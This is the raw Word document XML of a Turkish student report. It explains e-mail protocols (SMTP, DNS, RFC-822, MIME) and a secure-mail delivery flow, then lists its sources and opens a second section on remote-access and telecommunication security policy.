          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>göndermeye yardımcı olan internet standardıdır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E- posta sunucuları arasında mesaj aktarma yöntemi Temelde, bir iletinin  bilgisayarınızdan alıcının bilgisayarına yolculuğu aşağıdaki gibid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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7C4DD9" wp14:editId="7EC33D4B">
            <wp:extent cx="5760720" cy="3206184"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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206184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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13.DNS (DOMAİN NAME SİSTEM) ALAN ADI SİSTEM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Tarayıcınıza adres çubuğuna girdiğiniz site ismini  IP Adresine çevirir ve yönlendirir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Örnek olarak  Tarayıcınıza ‘’ GOOGLE’ in IP adresi 74.125.224.83 adresini yazmaz onun yerine  </w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r w:rsidRPr="00E332D5">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.google</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .com yazarız DNS sunucusu bu adresi IP adresine yönlendirir. DNS sunucusu Site isimlerini IP adreslerine yönlendiren bir veri tabanına sahip  bilgisayar sunucusudur. Bu sistem SMTP Protokolü için e-posta yönlendirmesi için genişletilmişt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14.İNTERNET METİN MESAJLARININ ARPA STANDARTINDA FORMAT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Başlangıçta RFC -822 diğer RFC tarafından genişletilmiş ve değiştirilmiştir. Bu standart  değiştirilecek mesajların biçimin belirler.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metin bilgisi içermeyen  Çok parçalı mesaj gövdelerini  kodlamak için standart bir yöntemd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GÜVENLİ POSTA GÖNDERİMİ:</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lastRenderedPageBreak/>
        <w:t>Mesaj Göndermeden   Özel ağından özel bir şifreleme  anahtarı alır. Yazar  Mesajı gönderen Ağlara iki ortak anahtar yerleştirir. Birincisi İç anahtar halkasına yerleştirilmiş  İkincisi ise genel anahtardır.(Burada amaç İç postaları gizli tutmaktır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mesajı yazan genel özel anahtar şifrelemesini kullanabilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E-posta gönderen Kişisel network unda oturum açar posta sunucusu tarafından  şifre kullanılarak mesaj gönderilmeye hazır hale gelir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kişisel posta yardımcı programını kullanarak mesajı oluşturur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mesajların Güvenliği için tüm mesajlar dijital imza ile gönderilecek  tüm mesajlarda alındı bilgisi olacak özel anahtar şifreleme otomatik olarak kullanılacaktır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yazar Dokumanı imzalar(mesajı) ve güvenli bir sunucuya gönderir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mesaj şifrelenir ve dijital olarak imzalanır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yazarın Posta sunucusu donanım  düzeyinde dahili iletişimi korumak için yönlendiriciler(Routerler) şifrelen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Posta sunucusu  trafiğin dahili mi yoksa harici mi olduğunu belirler mesajı uygun şekilde güvenlik duvarına iletir.   Routerler tarafından internete iletilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alıcının  Güvenlik duvarının önündeki  ROUTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu katmandaki trafiğin şifresini çözer ancak ancak şifreli bırakır.. Mesaj daha sonra alıcının güvenlik duvarı tarafından alınır ve mesaj adreslemesini esas alarak mesaja izin verilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı mesajı virüslere karşı tarar ve posta sunucusuna iletir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mesaj alıcı  oturum açana kadar posta sunucunda saklanır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Posta sunucusu şifre korumalıdır ve burada bulunan tüm veriler ayrıca şifrelen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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Posta sunucusu daha sonra mesajı bireysel kullanıcıya iletir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sonra mesajı açar imza temelli eşleşen mesaj özetlerini doğrular.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alındı bildirimi otomatik olarak oluşturulur ve geri iletilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="231360AE" wp14:editId="3970C58F">
            <wp:extent cx="5760720" cy="3991960"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="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991960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="720"/>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ind w:left="720"/>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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kaynakça</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1. NIPC Advisory 02</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>001: Internet Content Advisory: Considering the Unintended Audience, National</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Infrastructure Protection Center, January 17, 2002.</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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Service Member’s Personal Protection Guide: A Self-Help Handbook to Combating Terrorism</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, U.S. Joint</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Chiefs of Staff, Joint Staff Guide 5260, July 1996.</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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Joint Tactics, Techniques and Procedures for Antiterrorism</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, U.S. Joint Chiefs of Staff, Joint Pub 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>07.2, 17</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March 1998, Appendix.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C71891" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ATF Bomb Threat Checklist</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, ATF-F 1613.1, Bureau of Alcohol, Tobacco and Firearms, June 1997.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C71891" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Merrill Lynch Resumes Critical Business Functions within Minutes of Attack, Janette Ballman, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disaster</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C71891" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recovery Journal</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 14, 4, p. 26, Fall 2001.</w:t>
      </w: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ind w:left="720"/>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ind w:left="720"/>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Pr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="102854C0" wp14:editId="76480371">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4125" name="Resim 4125"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Section: 2.3.4-2.3.5 </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Ahmet Ekmel KURT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>60757058</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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ARAMA </w:t>
      </w:r>
      <w:r w:rsidRPr="009A3CBB">
        <w:t>TEHLİKELERİNE KARŞI KORUMA: E-POSTA VE BİLGİ İLETİŞİMİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>İçerik:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009A3CBB">
        <w:t>Telekomünikasyon Gizlilik Politikası, Tailgating, Geri Arama Modemleri, Ana Bilgisayarı Koruma, Satıcı Çözümleri, İnternet Güvenliği, Güvenlik Duvarları, Yedekleme T1'leri</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009A3CBB">
        <w:t>Göçebe ve ev ofis ortamlarının ortaya çıkmasıyla birlikte, uzaktan erişim güvenliği bir kez daha güvenlik planlama faaliyetlerinde ön planda yer almaktadır. Herkes bir İnternet varlığı ve İnternet erişimi istiyor. Telekomünikasyon popülerliği kazanıyor. Dizüstü bilgisayarlar ile donanmış satış acentaları kırsal alanda dolaşıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">Göçebe ve ev ofislerinden gündelik erişime sistemlerin açılması çalışanlar, sistemler kritik öneme sahip ve gelir getirici hale gelmeden önce güvenlik prosedürlerinin uygulanmasını gerektirir. Bu makale, çevirmeli ve internet erişim sistemleri ile ilgili ele alınması gereken hususlara genel bir bakış sunmaktadır. Günümüzün mobil veri dünyasına yönelik hem fiziksel donanım hem de gizlilik politikaları için standartların nasıl sağlanacağına dair ipuçları da dahil edilmiştir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009A3CBB">
        <w:t>TELEKOMÜNİKASYON GİZLİLİK POLİTİKASI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Başka birinin gizli e-postasını okursanız ne olur? Şirket seninkini okuyabilir mi? Bir çalışanın özel gizlilik hakkı var mı? Birçok kişi ve şirketin nasıl cevap vereceği konusunda hiçbir fikri yoktur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009A3CBB">
        <w:t>Daha fazla işçi E-posta ve veri iletişimi kullandıkça, güvenliğin önemi artmakta ve sistemler gelir elde etmek için kullanılmadan önce sağlam bir şekilde kurulmalıdır. Sağlam bir telekomünikasyon gizlilik politikasından başlayarak, kuruluşlar çağrı sistemleri, geri arama modemleri ve kapsamlı satış sonrası ekipmanlardan güvenlik duvarlarını test etmek, tamamen gereksiz yapılandırmalar ve yedek T1'lere kadar çeşitli koruyucu önlemler almalıdırlar.</w:t>
      </w:r>
    </w:p>
